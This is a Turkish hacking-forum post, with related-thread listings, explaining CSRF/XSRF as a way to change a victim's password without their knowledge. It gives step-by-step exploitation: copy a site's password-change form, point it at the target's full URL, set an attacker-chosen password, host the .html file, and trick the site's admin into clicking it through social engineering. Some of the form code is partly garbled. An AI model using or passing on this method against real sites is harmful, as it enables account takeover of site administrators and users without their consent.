Konuyu Oyla:
  • Derecelendirme: 3/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
XSRF-CSRF
#1
CSRF/XSRF Nedir ?
- Öncelikle Bu zaafiyetlerin arasındaki fark şudur ; basit bir dosyayı kurbana yedirerek kurbanın şifresini
kurbandan izinsiz ve habersiz olarak değiştirmeye dayalı bir zaafiyettir ve amacıda budur...

CSRF/XSRF Açığı Nasıl Bulunur ?


- Site Scriptini Teleport , Httrack gibi programlarla indirip bakarak ----> Diğer açıklardada olduğu gibi oldukça uğraştırıcı bir iştir.
- Hedef Siteyi Toollar yardımcalığı ile taratarak .(Acunetix,Shadow Security scanner ) gibi...
- Manuel Olarak ( Makalemizdede Buna Değineceğiz )


CSRF/XSRF Nasıl Bulunur Ve Kullanılır ?



- Üyelik sistemi olan bir web sitesi düşünelim ki Aklımıza ilk gelecek siteler ;

--->Sosyal Paylaşım Platformları

--->MyBB,VBulletin, Smf gibi... ->Üzerine Kurulu Siteler


Bu Sitelerin Şifre Değiştirme Bölümlerini Böyle Farz Edelim : https://www.hedefsite.com/settings?tab=a...sword&view ----> Şifremizi Değiştirelim

Şifremizi Değiştirdiğimiz Zaman Böyle Bir Tablo Ortaya Çıkarsa : https://www.hedefsite.com/settings?tab=a...ntalistler ----->Xsrf/Csrf Açığı Mevcuttur.


XSRF/CSRF Açığı Olan Sitede Yapmamız Gerekenler ?


https://www.hedefsite.com/settings?tab=a...ntalistler -----> CTRL-u Veya sağ tuş yaparak sayfa kaynağını görüntüleyerek

<form></form>------> Taglarını Bulmak Ve......

<form method="GET" action="settings?tab=account§ion=password&view">
<input type="text" name="Şifre"> ---------------> Kodlarını Bularak Üzerinde Birkaç Değişiklik Yapmak....
<input type="Submit" Name="Submit" Value="Gönder">
</form>


Bu Değişiklikler:

<form method="GET" action="settings?tab=account§ion=password&view"> -----> Olan Yeri Sitenin Tam Adresiye değiştirmek ...

<form method="GET" action="www.hedefsite.com/settings?tab=account§ion=password&view"> ------> Bu Şekilde...

<input type="text" name="olması istediğiniz şifre"> --------> Olmasını İstediğimiz Şifreyi Yazmak


Değiştirdkten Sonraki Görünecek Kod Parçacığı Aynı Bu Şekilde Olması Lazım....

<form method="GET" action="www.hedefsite.com/settings?tab=account§ion=password&view">
<input type="text" name="olması istediğiniz şifre"> -------------------> Bu Şekilde .....
<input type="Submit" Name="Submit" Value="Gönder">
</form>



1-) Değiştirilen kod parçacığını .html uzantısı olarak kaydedin.

2-).html Uzantılı Dosyanızı Free Hostunuza Atın..

3-)Hedef sitenin admini bu dosyayı tıklatmaya çalışın sm gibi yöntemlerle ..tıkladığı anda hedef sitenin şifresi değişmiş olacaktır..İstediğiniz şifre ile....

Selametle
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  CSRF Açığı Nedir? Nasıl Kullanılır? Dark-Capar 3 115 16-08-2016, Saat: 20:41
Son Yorum: ReqDeq
  CSRF Anlamı ve CSRF Açıklarından Yararlanma KingSkrupellos 0 132 01-07-2016, Saat: 02:51
Son Yorum: KingSkrupellos
  CSRF/XSRF açığı bulma fargo 1 286 17-05-2015, Saat: 22:32
Son Yorum: hosume
  XSRF-CSRF Açıkları anlatımı BordoHackeR 1 433 25-01-2014, Saat: 14:42
Son Yorum: archavin
  Csrf & Xsrf hacking archavin 2 737 03-11-2013, Saat: 02:59
Son Yorum: CoderTurk
Anahtar Kelimeler

XSRF-CSRF indir, XSRF-CSRF Videosu, XSRF-CSRF Online izle, XSRF-CSRF Bedava indir, XSRF-CSRF Yükle, XSRF-CSRF Hakkında, XSRF-CSRF Nedir, XSRF-CSRF Free indir, XSRF-CSRF Oyunu, XSRF-CSRF Download


1 Ziyaretçi